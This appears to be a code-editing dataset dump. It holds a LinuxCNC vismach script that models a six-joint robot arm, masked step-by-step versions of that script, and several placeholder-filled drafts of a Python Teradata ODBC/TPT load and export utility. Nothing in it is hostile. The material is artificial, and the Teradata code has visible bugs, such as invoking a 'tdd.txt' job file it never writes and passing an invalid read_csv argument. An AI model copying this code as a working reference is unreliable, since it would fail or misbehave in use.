# "tooltip" for backplot will be the tip of the finger
tooltip = Capture()
# "hand" - the part the finger is attached to
link6 = Collection([
finger1,
Box(-25, -25, -10, 25, 25, 0)])
link6 = Translate([link6],0,0,-50)
link6 = Collection([tooltip,link6])
# assembly fingers, and make it rotate
link6 = HalRotate([link6],c,"joint6",1,0,0,1)
# moving part of wrist joint
link5 = Collection([
CylinderZ( 27, 30, 35, 30),
CylinderX(-13, 25, 13, 25),
Box(-11, -25, 0, 11, 25, 27)])
# move gripper to end of wrist and attach D6=95
link5 = Collection([
link5,
Translate([link6],0,0,95)])
# make wrist bend
link5 = HalRotate([link5],c,"joint5",1,1,0,0)
# fixed part of wrist joint (rotates on end of arm)
link4 = Collection([
CylinderX(-13, 22, -27, 22),
CylinderX( 13, 22, 27, 22),
Box(-15, -22, -30, -25, 22, 0),
Box( 15, -22, -30, 25, 22, 0),
Box(-25, -25, -45, 25, 25, -30)])
# attach wrist, move whole assembly forward so joint 4 is at origin
link4 = Translate([link4,link5], 0, 0, 0)
# make joint 4 rotate
link4 = HalRotate([link4],c,"joint4",1,0,0,1)
# next chunk link length is D4=400
link3 = Collection([
CylinderY(-50,35,25,35),
CylinderZ(0.0, 35, 400-45, 25)])
link3 = Translate([link3],0,50,0)
link3 = Collection([
link3,
CylinderX(-50,40,40,40)])
# move link4 forward and sideways (A3=50) and attach
link3 = Collection([
link3,
Translate([link4],0.0, 50, 400)])
# move whole assembly over so joint 3 is at origin (D3=100)
link3 = Translate([link3],100, 0, 0.0)
# rotate to J3 zero position
link3 = Rotate([link3],90,1,0,0)
# make joint 3 rotate
link3 = HalRotate([link3],c,"joint3",1,1,0,0)
# elbow stuff
link2 = CylinderX(-50,50,50,50)
# move elbow to end of upper arm
link2 = Translate([link2],0.0,0.0,400)
# rest of upper arm (A2 = 400)
link2 = Collection([
link2,
CylinderZ(400, 40, 0, 50),
CylinderX(-70,85,70,85)])
# move link 3 into place and attach
link2 = Collection([
link2,
Translate([link3], 0,0.0,400)])
# rotate into zero J2 position
link2 = Rotate([link2],90,1,0,0)
# make joint 2 rotate
link2 = HalRotate([link2],c,"joint2",1,1,0,0)
# shoulder stuff
link1 = Collection([
CylinderX(-70,70,70,70),
Box(-70,-70,0,70,70,-100)])
# move link2 to end and attach
link1 = Collection([
link1,
link2])
# move whole assembly up so joint 1 is at origin
link1 = Translate([link1],0.0, 0.0, 100)
# make joint 1 rotate
link1 = HalRotate([link1],c,"joint1",1,0,0,1)
# stationary base
link0 = Collection([
CylinderZ(750, 75, 800, 75),
CylinderZ(25, 90, 750, 50),
CylinderZ(0, 200, 35, 200)])
# move link1 to top and attach
link0 = Collection([
link0,
Translate([link1],0.0,0.0,800)])
# add a floor
floor = Box(-500,-500,-10,500,500,0.0)
work = Capture()
model = Collection([link0, floor, work])
main(model, tooltip, work, 1500)
|
flexible
|
{
"blob_id": "ae83a0e1ebf1190ab55459563bc7b86d240de89a",
"index": 4146,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nc.newpin('joint1', hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin('joint2', hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin('joint3', hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin('joint4', hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin('joint5', hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin('joint6', hal.HAL_FLOAT, hal.HAL_IN)\nc.ready()\n<mask token>\nmain(model, tooltip, work, 1500)\n",
"step-3": "<mask token>\nc = hal.component('pumagui')\nc.newpin('joint1', hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin('joint2', hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin('joint3', hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin('joint4', hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin('joint5', hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin('joint6', hal.HAL_FLOAT, hal.HAL_IN)\nc.ready()\nfinger1 = CylinderZ(0, 5, 50, 5)\ntooltip = Capture()\nlink6 = Collection([finger1, Box(-25, -25, -10, 25, 25, 0)])\nlink6 = Translate([link6], 0, 0, -50)\nlink6 = Collection([tooltip, link6])\nlink6 = HalRotate([link6], c, 'joint6', 1, 0, 0, 1)\nlink5 = Collection([CylinderZ(27, 30, 35, 30), CylinderX(-13, 25, 13, 25),\n Box(-11, -25, 0, 11, 25, 27)])\nlink5 = Collection([link5, Translate([link6], 0, 0, 95)])\nlink5 = HalRotate([link5], c, 'joint5', 1, 1, 0, 0)\nlink4 = Collection([CylinderX(-13, 22, -27, 22), CylinderX(13, 22, 27, 22),\n Box(-15, -22, -30, -25, 22, 0), Box(15, -22, -30, 25, 22, 0), Box(-25, \n -25, -45, 25, 25, -30)])\nlink4 = Translate([link4, link5], 0, 0, 0)\nlink4 = HalRotate([link4], c, 'joint4', 1, 0, 0, 1)\nlink3 = Collection([CylinderY(-50, 35, 25, 35), CylinderZ(0.0, 35, 400 - 45,\n 25)])\nlink3 = Translate([link3], 0, 50, 0)\nlink3 = Collection([link3, CylinderX(-50, 40, 40, 40)])\nlink3 = Collection([link3, Translate([link4], 0.0, 50, 400)])\nlink3 = Translate([link3], 100, 0, 0.0)\nlink3 = Rotate([link3], 90, 1, 0, 0)\nlink3 = HalRotate([link3], c, 'joint3', 1, 1, 0, 0)\nlink2 = CylinderX(-50, 50, 50, 50)\nlink2 = Translate([link2], 0.0, 0.0, 400)\nlink2 = Collection([link2, CylinderZ(400, 40, 0, 50), CylinderX(-70, 85, 70,\n 85)])\nlink2 = Collection([link2, Translate([link3], 0, 0.0, 400)])\nlink2 = Rotate([link2], 90, 1, 0, 0)\nlink2 = HalRotate([link2], c, 'joint2', 1, 1, 0, 0)\nlink1 = Collection([CylinderX(-70, 70, 70, 70), Box(-70, -70, 0, 70, 70, -100)]\n )\nlink1 = Collection([link1, link2])\nlink1 = Translate([link1], 0.0, 0.0, 100)\nlink1 = HalRotate([link1], c, 'joint1', 1, 0, 0, 1)\nlink0 = Collection([CylinderZ(750, 75, 800, 75), CylinderZ(25, 90, 750, 50),\n CylinderZ(0, 200, 35, 200)])\nlink0 = Collection([link0, Translate([link1], 0.0, 0.0, 800)])\nfloor = Box(-500, -500, -10, 500, 500, 0.0)\nwork = Capture()\nmodel = Collection([link0, floor, work])\nmain(model, tooltip, work, 1500)\n",
"step-4": "from vismach import *\nimport hal\nc = hal.component('pumagui')\nc.newpin('joint1', hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin('joint2', hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin('joint3', hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin('joint4', hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin('joint5', hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin('joint6', hal.HAL_FLOAT, hal.HAL_IN)\nc.ready()\nfinger1 = CylinderZ(0, 5, 50, 5)\ntooltip = Capture()\nlink6 = Collection([finger1, Box(-25, -25, -10, 25, 25, 0)])\nlink6 = Translate([link6], 0, 0, -50)\nlink6 = Collection([tooltip, link6])\nlink6 = HalRotate([link6], c, 'joint6', 1, 0, 0, 1)\nlink5 = Collection([CylinderZ(27, 30, 35, 30), CylinderX(-13, 25, 13, 25),\n Box(-11, -25, 0, 11, 25, 27)])\nlink5 = Collection([link5, Translate([link6], 0, 0, 95)])\nlink5 = HalRotate([link5], c, 'joint5', 1, 1, 0, 0)\nlink4 = Collection([CylinderX(-13, 22, -27, 22), CylinderX(13, 22, 27, 22),\n Box(-15, -22, -30, -25, 22, 0), Box(15, -22, -30, 25, 22, 0), Box(-25, \n -25, -45, 25, 25, -30)])\nlink4 = Translate([link4, link5], 0, 0, 0)\nlink4 = HalRotate([link4], c, 'joint4', 1, 0, 0, 1)\nlink3 = Collection([CylinderY(-50, 35, 25, 35), CylinderZ(0.0, 35, 400 - 45,\n 25)])\nlink3 = Translate([link3], 0, 50, 0)\nlink3 = Collection([link3, CylinderX(-50, 40, 40, 40)])\nlink3 = Collection([link3, Translate([link4], 0.0, 50, 400)])\nlink3 = Translate([link3], 100, 0, 0.0)\nlink3 = Rotate([link3], 90, 1, 0, 0)\nlink3 = HalRotate([link3], c, 'joint3', 1, 1, 0, 0)\nlink2 = CylinderX(-50, 50, 50, 50)\nlink2 = Translate([link2], 0.0, 0.0, 400)\nlink2 = Collection([link2, CylinderZ(400, 40, 0, 50), CylinderX(-70, 85, 70,\n 85)])\nlink2 = Collection([link2, Translate([link3], 0, 0.0, 400)])\nlink2 = Rotate([link2], 90, 1, 0, 0)\nlink2 = HalRotate([link2], c, 'joint2', 1, 1, 0, 0)\nlink1 = Collection([CylinderX(-70, 70, 70, 70), Box(-70, -70, 0, 70, 70, -100)]\n )\nlink1 = Collection([link1, link2])\nlink1 = Translate([link1], 0.0, 0.0, 100)\nlink1 = HalRotate([link1], c, 'joint1', 1, 0, 0, 1)\nlink0 = Collection([CylinderZ(750, 75, 800, 75), CylinderZ(25, 90, 750, 50),\n CylinderZ(0, 200, 35, 200)])\nlink0 = Collection([link0, Translate([link1], 0.0, 0.0, 800)])\nfloor = Box(-500, -500, -10, 500, 500, 0.0)\nwork = Capture()\nmodel = Collection([link0, floor, work])\nmain(model, tooltip, work, 1500)\n",
"step-5": "#! /usr/bin/python2\n# Copyright 2007 John Kasunich and Jeff Epler\n# \n# modified by Rudy du Preez to fit with the kinematics component pumakins.c\n# Note: DH parameters in pumakins halfile should bet set to \n# A2=400, A3=50, D3=100, D4=400, D6=95\n#\n# z | \n# | \n# |__________y top of the base.\n# /\n# / A2\n# x /\n# /_______\n# D3 /\n# / A3\n# |\n# |\n# | D4\n# |___\n# |\n# tooltip | D6\n#\n# or they should be changed below to fit. Otherwise you wont get straight lines\n# moving x or y or z in world mode. If all is correct the tool should rotate \n# about its tip with no x,y,z movement for changes in A,B,C at any point in the \n# workspace.\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n\n\nfrom vismach import *\nimport hal\n\nc = hal.component(\"pumagui\")\nc.newpin(\"joint1\", hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin(\"joint2\", hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin(\"joint3\", hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin(\"joint4\", hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin(\"joint5\", hal.HAL_FLOAT, hal.HAL_IN)\nc.newpin(\"joint6\", hal.HAL_FLOAT, hal.HAL_IN)\nc.ready()\n\n###################\n\n# tool or finger \nfinger1 = CylinderZ(0, 5, 50, 5)\n\n# \"tooltip\" for backplot will be the tip of the finger\ntooltip = Capture()\n\n# \"hand\" - the part the finger is attached to\nlink6 = Collection([\n finger1,\n\tBox(-25, -25, -10, 25, 25, 0)])\nlink6 = Translate([link6],0,0,-50)\nlink6 = Collection([tooltip,link6])\n# assembly fingers, and make it rotate\nlink6 = HalRotate([link6],c,\"joint6\",1,0,0,1)\n\n# moving part of wrist joint\nlink5 = Collection([\n\tCylinderZ( 27, 30, 35, 30),\n\tCylinderX(-13, 25, 13, 25),\n\tBox(-11, -25, 0, 11, 25, 27)])\n# move gripper to end of wrist and attach D6=95\nlink5 = Collection([\n\tlink5,\n\tTranslate([link6],0,0,95)])\n# make wrist bend\nlink5 = HalRotate([link5],c,\"joint5\",1,1,0,0)\n\n# fixed part of wrist joint (rotates on end of arm)\nlink4 = Collection([\n\tCylinderX(-13, 22, -27, 22),\n\tCylinderX( 13, 22, 27, 22),\n\tBox(-15, -22, -30, -25, 22, 0),\n\tBox( 15, -22, -30, 25, 22, 0),\n\tBox(-25, -25, -45, 25, 25, -30)])\n# attach wrist, move whole assembly forward so joint 4 is at origin\nlink4 = Translate([link4,link5], 0, 0, 0)\n# make joint 4 rotate\nlink4 = HalRotate([link4],c,\"joint4\",1,0,0,1)\n\n# next chunk link length is D4=400\nlink3 = Collection([\n\tCylinderY(-50,35,25,35),\n\tCylinderZ(0.0, 35, 400-45, 25)])\nlink3 = Translate([link3],0,50,0)\nlink3 = Collection([\n link3,\n CylinderX(-50,40,40,40)])\n# move link4 forward and sideways (A3=50) and attach\nlink3 = Collection([\n\tlink3,\n\tTranslate([link4],0.0, 50, 400)])\n# move whole assembly over so joint 3 is at origin (D3=100)\nlink3 = Translate([link3],100, 0, 0.0)\n# rotate to J3 zero position\nlink3 = Rotate([link3],90,1,0,0)\n# make joint 3 rotate\nlink3 = HalRotate([link3],c,\"joint3\",1,1,0,0)\n\n# elbow stuff\nlink2 = CylinderX(-50,50,50,50)\n# move elbow to end of upper arm\nlink2 = Translate([link2],0.0,0.0,400)\n# rest of upper arm (A2 = 400)\nlink2 = Collection([\n\tlink2,\n\tCylinderZ(400, 40, 0, 50),\n\tCylinderX(-70,85,70,85)])\n# move link 3 into place and attach\nlink2 = Collection([\n\tlink2,\n\tTranslate([link3], 0,0.0,400)])\n# rotate into zero J2 position\nlink2 = Rotate([link2],90,1,0,0)\n# make joint 2 rotate\nlink2 = HalRotate([link2],c,\"joint2\",1,1,0,0)\n\n# shoulder stuff\nlink1 = Collection([\n\tCylinderX(-70,70,70,70),\n\tBox(-70,-70,0,70,70,-100)])\n# move link2 to end and attach\nlink1 = Collection([\n\tlink1,\n\tlink2])\n# move whole assembly up so joint 1 is at origin\nlink1 = Translate([link1],0.0, 0.0, 100)\n# make joint 1 rotate\nlink1 = HalRotate([link1],c,\"joint1\",1,0,0,1)\n\n# stationary base\nlink0 = Collection([\n\tCylinderZ(750, 75, 800, 75),\n\tCylinderZ(25, 90, 750, 50),\n\tCylinderZ(0, 200, 35, 200)])\n# move link1 to top and attach\nlink0 = Collection([\n\tlink0,\n\tTranslate([link1],0.0,0.0,800)])\n\n# add a floor\nfloor = Box(-500,-500,-10,500,500,0.0)\nwork = Capture()\n\nmodel = Collection([link0, floor, work])\n\nmain(model, tooltip, work, 1500)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def get_session(db, usr, pwd):
"""Функция устанавливает соединение с ТД и возвращает сессию"""
if platform.system() == 'Windows':
driver = 'Teradata'
else:
driver = 'Teradata Database ODBC Driver 16.20'
udaExec = teradata.UdaExec(appName='DataLoad', version='0.1',
logConsole=False)
session = udaExec.connect(method='odbc', system=db, username=usr,
password=pwd, driver=driver, charset='UTF8', autoCommit='True',
USEREGIONALSETTINGS='N', transactionMode='TERADATA')
return session
def sql2df(query, session, chunksize=100000):
""" Функция грузит из терадаты данные в батчах по 100к и склеивает их в одну таблицу """
db = pd.read_sql(query, session, chunksize=chunksize)
data = pd.DataFrame()
for x in tqdm(db):
data = pd.concat([data, x])
return data
def check_config():
""" .twbcfg.ini to root path """
path = os.path.expanduser('~')
config_path = os.path.join(path, '.twbcfg.ini')
log_path = os.path.join(path, 'tmp', 'teradata_logs')
if not os.path.exists(config_path):
if not os.path.exists(log_path):
os.mkdir(log_path)
config = (
f"CheckpointDirectory='{log_path}' \n LogDirectory='{log_path}' "
)
with open(config_path, 'w') as f:
f.write(config)
<|reserved_special_token_0|>
def py2td(x):
"""Функция вставляет пропуски и корректирует тип данных под ТД"""
x_type = type(x)
if x_type == float:
if x % 1 == 0:
return int(x)
else:
return x
elif x == 'null':
return None
else:
return x
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_session(db, usr, pwd):
"""Функция устанавливает соединение с ТД и возвращает сессию"""
if platform.system() == 'Windows':
driver = 'Teradata'
else:
driver = 'Teradata Database ODBC Driver 16.20'
udaExec = teradata.UdaExec(appName='DataLoad', version='0.1',
logConsole=False)
session = udaExec.connect(method='odbc', system=db, username=usr,
password=pwd, driver=driver, charset='UTF8', autoCommit='True',
USEREGIONALSETTINGS='N', transactionMode='TERADATA')
return session
def sql2df(query, session, chunksize=100000):
""" Функция грузит из терадаты данные в батчах по 100к и склеивает их в одну таблицу """
db = pd.read_sql(query, session, chunksize=chunksize)
data = pd.DataFrame()
for x in tqdm(db):
data = pd.concat([data, x])
return data
def check_config():
""" .twbcfg.ini to root path """
path = os.path.expanduser('~')
config_path = os.path.join(path, '.twbcfg.ini')
log_path = os.path.join(path, 'tmp', 'teradata_logs')
if not os.path.exists(config_path):
if not os.path.exists(log_path):
os.mkdir(log_path)
config = (
f"CheckpointDirectory='{log_path}' \n LogDirectory='{log_path}' "
)
with open(config_path, 'w') as f:
f.write(config)
<|reserved_special_token_0|>
def py2td(x):
"""Функция вставляет пропуски и корректирует тип данных под ТД"""
x_type = type(x)
if x_type == float:
if x % 1 == 0:
return int(x)
else:
return x
elif x == 'null':
return None
else:
return x
def td_import(username='', password='', bd='tdsb15.cgs.sbrf.ru', tbl_name=
'', schema='SBX_RETAIL_MP_PFM', loadframe=True, df=None, path_to_file=
None, fast=False, batch_size=12000, max_sessions=6, buffersize=524288):
"""
Функция записывате данные в ТД через утилиты или ODBC
"""
table = schema + '.' + tbl_name
if not fast:
if not loadframe:
df = pd.read_csv(path_to_file, sep=';', encoding='utf8', index=
False)
n_iters = len(df) // batch_size + (len(df) % batch_size > 0)
df_dict = df.to_dict('records')
session = get_session(bd, username, password)
for i in tqdm(range(n_iters), total=n_iters):
session.executemany(
f"INSERT INTO {table} VALUES ({','.join(list('?' * df.shape[1]))})"
, [list(row.values()) for row in df_dict[i * batch_size:i *
batch_size + batch_size]], batch=True)
session.close()
else:
check_config()
local_seed = str(random.randint(0, 1000000))
path_to_folder = os.path.join(os.getcwd(), 'data', 'output_' +
local_seed)
if os.path.exists(path_to_folder):
shutil.rmtree(path_to_folder)
else:
os.mkdir(path_to_folder)
if loadframe:
converted = df.replace(np.NaN, '').astype(str)
path_to_file = path_to_folder + '/tmp.csv'
converted.to_csv(path_to_file, index=False, header=False, sep=
';', encoding='utf8')
converted_len = converted.apply(lambda x: x.str.encode('utf-8')
.apply(len)).max().to_dict()
else:
converted_len = pd.read_csv(path_to_file, sep=';', dtype='str',
header=None, encoding='utf8', low_memory=False, nrows=100000)
columns_query = f'select * from {table} where 1=0'
session = get_session(bd, username, password)
columns_names = pd.read_sql(columns_query, session).columns.tolist(
)
session.close()
shutil.copy(path_to_file, path_to_folder + '/tmp.csv')
converted_len.columns = columns_names
converted_len = converted_len.apply(lambda x: x.str.encode(
'utf-8').apply(len)).max().to_dict()
td_temp_table = table + '_tmp_' + local_seed
session = get_session(bd, username, password)
session.execute(
f'create multiset table {td_temp_table} as {table} with no data no primary index'
)
session.close()
txt = f"""USING CHARACTER SET UTF8
DEFINE JOB teradata_upload
Description 'Fastload script'
(
DEFINE OPERATOR Load_operator
TYPE LOAD
SCHEMA *
ATTRIBUTES
(
VARCHAR TdPid='{bd}',
VARCHAR UserName='{username}',
VARCHAR UserPassWord='{password}',
VARCHAR TargetTable='{td_temp_table}',
VARCHAR LogTable='{schema}.usr_tpt_log',
VARCHAR DateForm='AnsiDate',
INTEGER MaxSessions={max_sessions}
);
DEFINE SCHEMA Define_Employee_Schema
(
{','.join(f'{key} VARCHAR({max(1, value * 2)})' for key, value in converted_len.items())}
);
DEFINE OPERATOR Producer_File_Detail
TYPE DATACONNECTOR PRODUCER
SCHEMA Define_Employee_Schema
ATTRIBUTES
(
VARCHAR DirectoryPath='{path_to_folder}/'
, VARCHAR FileName='tmp.csv'
, VARCHAR TextDelimiter=';'
, VARCHAR QuotedData = 'Optional'
, VARCHAR OpenQuoteMark = '"'
, VARCHAR CloseQuoteMark = '"'
, VARCHAR Format='Delimited'
, VARCHAR OpenMode='Read'
, VARCHAR INDICATORMODE='N'
, INTEGER BUFFERSIZE = {buffersize}
);
APPLY
(
'INSERT INTO {td_temp_table}({','.join(f'{key}' for key, value in converted_len.items())}) VALUES (:{',:'.join(f'{key}' for key, value in converted_len.items())});'
)
TO OPERATOR(Load_operator)
SELECT * FROM OPERATOR (Producer_File_Detail);
);"""
with open(path_to_folder + '/load_code.tpt', 'w+') as f:
f.write(txt)
p = subprocess.Popen(shlex.split(
f'tbuild -f {path_to_folder}/load_code.tpt -L {path_to_folder}'))
p.wait()
print('Merging in Teradata... \r', end='', flush=True)
session = get_session(bd, username, password)
session.execute(f'insert into {table} sel * from {td_temp_table}')
session.close()
print('Cleaning... \r', end='', flush=True)
session = get_session(bd, username, password)
session.execute(f'drop table {td_temp_table}')
session.close()
shutil.rmtree(path_to_folder)
print('Done!')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_session(db, usr, pwd):
"""Функция устанавливает соединение с ТД и возвращает сессию"""
if platform.system() == 'Windows':
driver = 'Teradata'
else:
driver = 'Teradata Database ODBC Driver 16.20'
udaExec = teradata.UdaExec(appName='DataLoad', version='0.1',
logConsole=False)
session = udaExec.connect(method='odbc', system=db, username=usr,
password=pwd, driver=driver, charset='UTF8', autoCommit='True',
USEREGIONALSETTINGS='N', transactionMode='TERADATA')
return session
def sql2df(query, session, chunksize=100000):
""" Функция грузит из терадаты данные в батчах по 100к и склеивает их в одну таблицу """
db = pd.read_sql(query, session, chunksize=chunksize)
data = pd.DataFrame()
for x in tqdm(db):
data = pd.concat([data, x])
return data
def check_config():
""" .twbcfg.ini to root path """
path = os.path.expanduser('~')
config_path = os.path.join(path, '.twbcfg.ini')
log_path = os.path.join(path, 'tmp', 'teradata_logs')
if not os.path.exists(config_path):
if not os.path.exists(log_path):
os.mkdir(log_path)
config = (
f"CheckpointDirectory='{log_path}' \n LogDirectory='{log_path}' "
)
with open(config_path, 'w') as f:
f.write(config)
def td_download(query='', bd='tdsb15.cgs.sbrf.ru', username='', password='',
fast=False, return_df=False, csv=True, chunksize=100000):
"""
Функция возвращает данные из ТД: путь к csv или датафрейм.
fast=True - использовать утилиты ТД, False - ODBC;
return_df - вернуть датафрейм;
csv - записать данные в файл при fast=False;
chunksize - размер бача для ODBC;
query должен содержать where, чтобы выгрузить название столбцов из БД
"""
local_seed = str(random.randint(0, 1000000))
query = query.replace('\n', ' ')
if not fast:
session = get_session(bd, username, password)
frame = sql2df(query, session, chunksize=chunksize)
session.close()
if return_df:
return frame
else:
path_to_file = os.path.join(os.getcwd(), 'data', 'input_' +
local_seed)
if csv:
filename = path_to_file + '.csv'
frame.to_csv(filename, sep=';', index=False, encoding='utf8')
return filename
else:
dump(frame, path_to_file)
return path_to_file
else:
check_config()
query = query.replace("'", "''")
path_to_folder = os.path.join(os.getcwd(), 'data', 'input_' +
local_seed)
if os.path.exists(path_to_folder):
shutil.rmtree(path_to_folder)
os.mkdir(path_to_folder)
else:
os.mkdir(path_to_folder)
path_to_file = os.path.join(path_to_folder, 'dataset.csv')
open(path_to_file, 'w').close()
txt = (
"""SourceTdpId = '%s'
,SourceUserName = '%s'
,SourceUserPassword = '%s'
,DDLPrivateLogName = 'ddlprivate.log'
,ExportPrivateLogName = 'exportprivate.log'
,TargetErrorList = ['3807']
,TargetFileName = '%s'
,TargetFormat = 'delimited'
,TargetTextDelimiter = ';'
,TargetOpenMode = 'write'
,SelectStmt = '%s' """
% (bd, username, password, path_to_file, query))
qtxt = """USING CHAR SET UTF-8
DEFINE JOB qstart2
(
APPLY TO OPERATOR ($FILE_WRITER)
SELECT * FROM OPERATOR($EXPORT);
);"""
with open(path_to_folder + '/qstart2.txt', 'w+') as f:
f.write(qtxt)
with open(path_to_folder + '/jobvars.txt', 'w+') as f:
f.write(txt)
p = subprocess.run(shlex.split(
f'tbuild -f {path_to_folder}/tdd.txt -v {path_to_folder}/jobvars.txt -j tdd_{str(local_seed)}'
), stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
query = query.replace('\n', ' ').replace("''", "'")
query = query.lower()
query_list = query.split('where')
if len(query_list) == 2:
columns_query = ' where 1=0 and '.join(query_list)
session = get_session(bd, username, password)
columns_names = pd.read_sql(columns_query, session).columns.tolist(
)
session.close()
else:
print("Coudn't load columns names")
columns_names = None
if not return_df:
if columns_names:
with open(path_to_folder + '/columns_names.txt', 'w') as f:
f.write('\n'.join(columns_names))
return path_to_file
else:
if columns_names:
frame = pd.read_csv(path_to_file, names=columns_names,
delimiter=';')
else:
frame = pd.read_csv(path_to_file, header=None, delimiter=';')
return frame
def py2td(x):
"""Функция вставляет пропуски и корректирует тип данных под ТД"""
x_type = type(x)
if x_type == float:
if x % 1 == 0:
return int(x)
else:
return x
elif x == 'null':
return None
else:
return x
def td_import(username='', password='', bd='tdsb15.cgs.sbrf.ru', tbl_name=
'', schema='SBX_RETAIL_MP_PFM', loadframe=True, df=None, path_to_file=
None, fast=False, batch_size=12000, max_sessions=6, buffersize=524288):
"""
Функция записывате данные в ТД через утилиты или ODBC
"""
table = schema + '.' + tbl_name
if not fast:
if not loadframe:
df = pd.read_csv(path_to_file, sep=';', encoding='utf8', index=
False)
n_iters = len(df) // batch_size + (len(df) % batch_size > 0)
df_dict = df.to_dict('records')
session = get_session(bd, username, password)
for i in tqdm(range(n_iters), total=n_iters):
session.executemany(
f"INSERT INTO {table} VALUES ({','.join(list('?' * df.shape[1]))})"
, [list(row.values()) for row in df_dict[i * batch_size:i *
batch_size + batch_size]], batch=True)
session.close()
else:
check_config()
local_seed = str(random.randint(0, 1000000))
path_to_folder = os.path.join(os.getcwd(), 'data', 'output_' +
local_seed)
if os.path.exists(path_to_folder):
shutil.rmtree(path_to_folder)
else:
os.mkdir(path_to_folder)
if loadframe:
converted = df.replace(np.NaN, '').astype(str)
path_to_file = path_to_folder + '/tmp.csv'
converted.to_csv(path_to_file, index=False, header=False, sep=
';', encoding='utf8')
converted_len = converted.apply(lambda x: x.str.encode('utf-8')
.apply(len)).max().to_dict()
else:
converted_len = pd.read_csv(path_to_file, sep=';', dtype='str',
header=None, encoding='utf8', low_memory=False, nrows=100000)
columns_query = f'select * from {table} where 1=0'
session = get_session(bd, username, password)
columns_names = pd.read_sql(columns_query, session).columns.tolist(
)
session.close()
shutil.copy(path_to_file, path_to_folder + '/tmp.csv')
converted_len.columns = columns_names
converted_len = converted_len.apply(lambda x: x.str.encode(
'utf-8').apply(len)).max().to_dict()
td_temp_table = table + '_tmp_' + local_seed
session = get_session(bd, username, password)
session.execute(
f'create multiset table {td_temp_table} as {table} with no data no primary index'
)
session.close()
txt = f"""USING CHARACTER SET UTF8
DEFINE JOB teradata_upload
Description 'Fastload script'
(
DEFINE OPERATOR Load_operator
TYPE LOAD
SCHEMA *
ATTRIBUTES
(
VARCHAR TdPid='{bd}',
VARCHAR UserName='{username}',
VARCHAR UserPassWord='{password}',
VARCHAR TargetTable='{td_temp_table}',
VARCHAR LogTable='{schema}.usr_tpt_log',
VARCHAR DateForm='AnsiDate',
INTEGER MaxSessions={max_sessions}
);
DEFINE SCHEMA Define_Employee_Schema
(
{','.join(f'{key} VARCHAR({max(1, value * 2)})' for key, value in converted_len.items())}
);
DEFINE OPERATOR Producer_File_Detail
TYPE DATACONNECTOR PRODUCER
SCHEMA Define_Employee_Schema
ATTRIBUTES
(
VARCHAR DirectoryPath='{path_to_folder}/'
, VARCHAR FileName='tmp.csv'
, VARCHAR TextDelimiter=';'
, VARCHAR QuotedData = 'Optional'
, VARCHAR OpenQuoteMark = '"'
, VARCHAR CloseQuoteMark = '"'
, VARCHAR Format='Delimited'
, VARCHAR OpenMode='Read'
, VARCHAR INDICATORMODE='N'
, INTEGER BUFFERSIZE = {buffersize}
);
APPLY
(
'INSERT INTO {td_temp_table}({','.join(f'{key}' for key, value in converted_len.items())}) VALUES (:{',:'.join(f'{key}' for key, value in converted_len.items())});'
)
TO OPERATOR(Load_operator)
SELECT * FROM OPERATOR (Producer_File_Detail);
);"""
with open(path_to_folder + '/load_code.tpt', 'w+') as f:
f.write(txt)
p = subprocess.Popen(shlex.split(
f'tbuild -f {path_to_folder}/load_code.tpt -L {path_to_folder}'))
p.wait()
print('Merging in Teradata... \r', end='', flush=True)
session = get_session(bd, username, password)
session.execute(f'insert into {table} sel * from {td_temp_table}')
session.close()
print('Cleaning... \r', end='', flush=True)
session = get_session(bd, username, password)
session.execute(f'drop table {td_temp_table}')
session.close()
shutil.rmtree(path_to_folder)
print('Done!')
<|reserved_special_token_1|>
import os
import numpy as np
import pandas as pd
import random
import platform
import subprocess
import shlex
import teradata
from joblib import dump
import shutil
from tqdm import tqdm
def get_session(db, usr, pwd):
"""Функция устанавливает соединение с ТД и возвращает сессию"""
if platform.system() == 'Windows':
driver = 'Teradata'
else:
driver = 'Teradata Database ODBC Driver 16.20'
udaExec = teradata.UdaExec(appName='DataLoad', version='0.1',
logConsole=False)
session = udaExec.connect(method='odbc', system=db, username=usr,
password=pwd, driver=driver, charset='UTF8', autoCommit='True',
USEREGIONALSETTINGS='N', transactionMode='TERADATA')
return session
def sql2df(query, session, chunksize=100000):
""" Функция грузит из терадаты данные в батчах по 100к и склеивает их в одну таблицу """
db = pd.read_sql(query, session, chunksize=chunksize)
data = pd.DataFrame()
for x in tqdm(db):
data = pd.concat([data, x])
return data
def check_config():
""" .twbcfg.ini to root path """
path = os.path.expanduser('~')
config_path = os.path.join(path, '.twbcfg.ini')
log_path = os.path.join(path, 'tmp', 'teradata_logs')
if not os.path.exists(config_path):
if not os.path.exists(log_path):
os.mkdir(log_path)
config = (
f"CheckpointDirectory='{log_path}' \n LogDirectory='{log_path}' "
)
with open(config_path, 'w') as f:
f.write(config)
